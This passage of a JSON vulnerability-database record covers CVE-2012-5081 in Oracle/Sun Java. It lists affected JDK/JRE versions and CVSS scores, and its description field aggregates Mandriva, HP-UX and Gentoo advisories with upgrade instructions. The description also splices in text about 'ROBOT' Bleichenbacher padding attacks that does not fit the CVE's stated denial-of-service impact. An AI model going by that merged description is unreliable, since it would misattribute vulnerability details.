"cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update11_b03:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_26:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_13:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_30:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_27:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_31:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_24:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_31:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_18:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_29:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.4.2_38", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_23:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_32:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_29:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_16:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_26:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_25:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_19:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_23:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_32:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_17:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_28:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_37:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_28:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_35:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_36:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_14:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_25:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_33:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_34:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_30:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.4.2_38", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_37:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_27:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_35:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_36:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_33:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_11:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_22:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_15:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_34:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2012-5081" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "117454" }, { "db": "PACKETSTORM", "id": "123734" }, { "db": "PACKETSTORM", "id": "117478" }, { "db": "PACKETSTORM", "id": "118306" }, { "db": "PACKETSTORM", "id": "118140" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "117453" } ], "trust": 0.7 }, "cve": "CVE-2012-5081", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2012-5081", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2012-5081", "trust": 1.0, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201210-293", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2012-5081", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2012-5081" }, { "db": "CNNVD", "id": "CNNVD-201210-293" }, { "db": "NVD", "id": "CVE-2012-5081" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect availability, related to JSSE. TLS implementations may disclose side channel information via discrepancies between valid and invalid PKCS#1 padding, and may therefore be vulnerable to Bleichenbacher-style attacks. This attack is known as a \"ROBOT attack\". \nThe vulnerability can be exploited over the \u0027SSL/TLS\u0027 protocol. This issue affects the \u0027JSSE\u0027 sub-component. \nThis vulnerability affects the following supported versions:\n7 Update 7, 6 Update 35, 5.0 Update 36, 1.4.2_38. In a typical operating environment, these are of low security risk as\nthe runtime is not used on untrusted applets. Further\ninformation about these flaws can be found on the Oracle Java SE Critical\nPatch Update Advisory and Oracle Security Alert pages, listed in the\nReferences section. \nOpenVMS Integrity JDK and JRE 6.0-3.p1 and earlier. Customers are advised to migrate to later\nversions of Java at this time. In\ncases where it is not feasible to move to a later version of supported\nJava, customers are advised to contact IBM to evaluate other options. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory MDVSA-2012:169\n http://www.mandriva.com/security/\n _______________________________________________________________________\n\n Package : java-1.6.0-openjdk\n Date : November 1, 2012\n Affected: 2011., Enterprise Server 5.0\n _______________________________________________________________________\n\n Problem Description:\n\n Multiple security issues were identified and fixed in OpenJDK\n (icedtea6):\n \n * S6631398, CVE-2012-3216: FilePermission improved path checking\n * S7093490: adjust package access in rmiregistry\n * S7143535, CVE-2012-5068: ScriptEngine corrected permissions\n * S7167656, CVE-2012-5077: Multiple Seeders are being created\n * S7169884, CVE-2012-5073: LogManager checks do not work correctly\n for sub-types\n * S7169888, CVE-2012-5075: Narrowing resource definitions in JMX\n RMI connector\n * S7172522, CVE-2012-5072: Improve DomainCombiner checking\n * S7186286, CVE-2012-5081: TLS implementation to better adhere to RFC\n * S7189103, CVE-2012-5069: Executors needs to maintain state\n * S7189490: More improvements to DomainCombiner checking\n * S7189567, CVE-2012-5085: java net obselete protocol\n * S7192975, CVE-2012-5071: Conditional usage check is wrong\n * S7195194, CVE-2012-5084: Better data validation for Swing\n * S7195917, CVE-2012-5086: XMLDecoder parsing at close-time should\n be improved\n * S7195919, CVE-2012-5979: (sl) ServiceLoader can throw CCE without\n needing to create instance\n * S7198296, CVE-2012-5089: Refactor classloader usage\n * S7158800: Improve storage of symbol tables\n * S7158801: Improve VM CompileOnly option\n * S7158804: Improve config file parsing\n * S7176337: Additional changes needed for 7158801 fix\n * S7198606, CVE-2012-4416: Improve VM optimization\n \n The updated packages provides icedtea6-1.11.5 which is not vulnerable\n to these issues. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niD8DBQFQklqImqjQ0CJFipgRAiNOAJ4qA9L2NTdql1htD7pQDNJrDlPnUgCguupW\nxu3AOptE+B1OsUdPAeTUH5o=\n=2CFK\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c03595351\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c03595351\nVersion: 1\n\nHPSBUX02832 SSRT101042 rev.1 - HP-UX Running Java, Remote Unauthorized\nAccess, Disclosure of Information, and Other Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2012-12-12\nLast Updated: 2012-12-12\n\nPotential Security Impact: Remote unauthorized access, disclosure of\ninformation, and other vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified in Java Runtime\nEnvironment (JRE) and Java Developer Kit (JDK) running on HP-UX. These\nvulnerabilities could allow remote unauthorized access, disclosure of\ninformation, and other exploits. \nHP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v7.0.03, v6.0.16\nand v5.0.26 and earlier\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2012-1531 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2012-1532 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2012-1533 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2012-3143 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2012-3159 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2012-3216 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6\nCVE-2012-4416 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2012-5068 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2012-5069 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8\nCVE-2012-5071 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2012-5072 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2012-5073 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2012-5075 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2012-5077 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6\nCVE-2012-5079 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2012-5081 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2012-5083 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2012-5084 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2012-5085 (AV:N/AC:M/Au:S/C:N/I:N/A:N) 0.0\nCVE-2012-5086 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2012-5087 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2012-5089 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nNOTE: The following apply to both v7.0.03 and v6.0.16 and earlier:\nCVE-2012-1531, CVE-2012-1532, CVE-2012-1533, CVE-2012-3143, CVE-2012-3159,\nCVE-2012-3216, CVE-2012-4416, CVE-2012-5068, CVE-2012-5069, CVE-2012-5071,\nCVE-2012-5072, CVE-2012-5073, CVE-2012-5075, CVE-2012-5077, CVE-2012-5079,\nCVE-2012-5081, CVE-2012-5083, CVE-2012-5084, CVE-2012-5085, CVE-2012-5086,\nCVE-2012-5087, CVE-2012-5089\n\nNOTE: The following apply to v5.0.26 and earlier: CVE-2012-1531,\nCVE-2012-3143, CVE-2012-3216, CVE-2012-5069, CVE-2012-5071, CVE-2012-5073,\nCVE-2012-5075, CVE-2012-5077, CVE-2012-5079, CVE-2012-5081, CVE-2012-5083,\nCVE-2012-5084, CVE-2012-5085, CVE-2012-5089\n\nRESOLUTION\n\nHP has provided the following Java version upgrade to resolve these\nvulnerabilities. \nThe upgrade is available from the following location\n\nhttp://www.hp.com/java\n\nHP-UX B.11.23, B.11.31\n JDK and JRE v7.0.04 or subsequent\n\nHP-UX B.11.11, B.11.23, B.11.31\n JDK and JRE v6.0.17 or subsequent\n\nHP-UX B.11.11, B.11.23, B.11.31\n JDK and JRE v5.0.27 or subsequent\n\nMANUAL ACTIONS: Yes - Update\nFor Java v7.0 update to Java v7.0.04 or subsequent\nFor Java v6.0 update to Java v6.0.17 or subsequent\nFor Java v5.0 update to Java v5.0.27 or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.23\nHP-UX B.11.31\n===========\nJdk70.JDK70-COM\nJdk70.JDK70-DEMO\nJdk70.JDK70-IPF32\nJdk70.JDK70-IPF64\nJre70.JRE70-COM\nJre70.JRE70-IPF32\nJre70.JRE70-IPF32-HS\nJre70.JRE70-IPF64\nJre70.JRE70-IPF64-HS\naction: install revision 1.7.0.04.00 or subsequent\n\nHP-UX B.11.23\nHP-UX B.11.31\n===========\nJdk60.JDK60-COM\nJdk60.JDK60-DEMO\nJdk60.JDK60-IPF32\nJdk60.JDK60-IPF64\nJre60.JRE60-COM\nJre60.JRE60-IPF32\nJre60.JRE60-IPF32-HS\nJre60.JRE60-IPF64\nJre60.JRE60-IPF64-HS\naction: install revision 1.6.0.17.00 or subsequent\n\nHP-UX B.11.23\nHP-UX B.11.31\n===========\nJdk15.JDK15-COM\nJdk15.JDK15-DEMO\nJdk15.JDK15-IPF32\nJdk15.JDK15-IPF64\nJre15.JRE15-COM\nJre15.JRE15-COM-DOC\nJre15.JRE15-IPF32\nJre15.JRE15-IPF32-HS\nJre15.JRE15-IPF64\nJre15.JRE15-IPF64-HS\naction: install revision 1.5.0.27.00 or subsequent\n\nHP-UX B.11.11\nHP-UX B.11.23\n===========\nJdk60.JDK60-COM\nJdk60.JDK60-DEMO\nJdk60.JDK60-PA20\nJdk60.JDK60-PA20W\nJre60.JRE60-COM\nJre60.JRE60-COM-DOC\nJre60.JRE60-PA20\nJre60.JRE60-PA20-HS\nJre60.JRE60-PA20W\nJre60.JRE60-PA20W-HS\naction: install revision 1.6.0.17.00 or subsequent\n\nHP-UX B.11.11\nHP-UX B.11.23\n===========\nJdk15.JDK15-COM\nJdk15.JDK15-DEMO\nJdk15.JDK15-PA20\nJdk15.JDK15-PA20W\nJre15.JRE15-COM\nJre15.JRE15-COM-DOC\nJre15.JRE15-PA20\nJre15.JRE15-PA20-HS\nJre15.JRE15-PA20W\nJre15.JRE15-PA20W-HS\naction: install revision 1.5.0.27.00 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 12 December 2012 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin List: A list of HP Security Bulletins, updated\nperiodically, is contained in HP Security Notice HPSN-2011-001:\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c02964430\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttp://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2012 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits;damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201401-30\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: Oracle JRE/JDK: Multiple vulnerabilities\n Date: January 27, 2014\n Bugs: #404071, #421073, #433094, #438706, #451206, #455174,\n #458444, #460360, #466212, #473830, #473980, #488210, #498148\n ID: 201401-30\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in the Oracle JRE/JDK,\nallowing attackers to cause unspecified impact. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-java/sun-jdk \u003c= 1.6.0.45 Vulnerable!\n 2 dev-java/oracle-jdk-bin \u003c 1.7.0.51 \u003e= 1.7.0.51 *\n 3 dev-java/sun-jre-bin \u003c= 1.6.0.45 Vulnerable!\n 4 dev-java/oracle-jre-bin \u003c 1.7.0.51 \u003e= 1.7.0.51 *\n 5 app-emulation/emul-linux-x86-java\n \u003c 1.7.0.51 \u003e= 1.7.0.51 *\n -------------------------------------------------------------------\n NOTE: Certain packages are still vulnerable. Users should migrate\n to another package if one is available or wait for the\n existing packages to be marked stable by their\n architecture maintainers. \n -------------------------------------------------------------------\n NOTE: Packages marked with asterisks require manual intervention!\n -------------------------------------------------------------------\n 5 affected packages\n\nDescription\n===========\n\nMultiple vulnerabilities have been reported in the Oracle Java\nimplementation. Please review the CVE identifiers referenced below for\ndetails. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Oracle JDK 1.7 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/oracle-jdk-bin-1.7.0.51\"\n\nAll Oracle JRE 1.7 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/oracle-jre-bin-1.7.0.51\"\n\nAll users of the precompiled 32-bit Oracle JRE should upgrade to the\nlatest version:\n\n # emerge --sync\n # emerge -a -1 -v \"\u003e=app-emulation/emul-linux-x86-java-1.7.0.51\"\n\nAll Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one\nof the newer Oracle packages like dev-java/oracle-jdk-bin or\ndev-java/oracle-jre-bin or choose another alternative we provide; eg. \nthe IBM JDK/JRE or the open source IcedTea. \n\nReferences\n==========\n\n[ 1 ] CVE-2011-3563\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563\n[ 2 ] CVE-2011-5035\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035\n[ 3 ] CVE-2012-0497\n 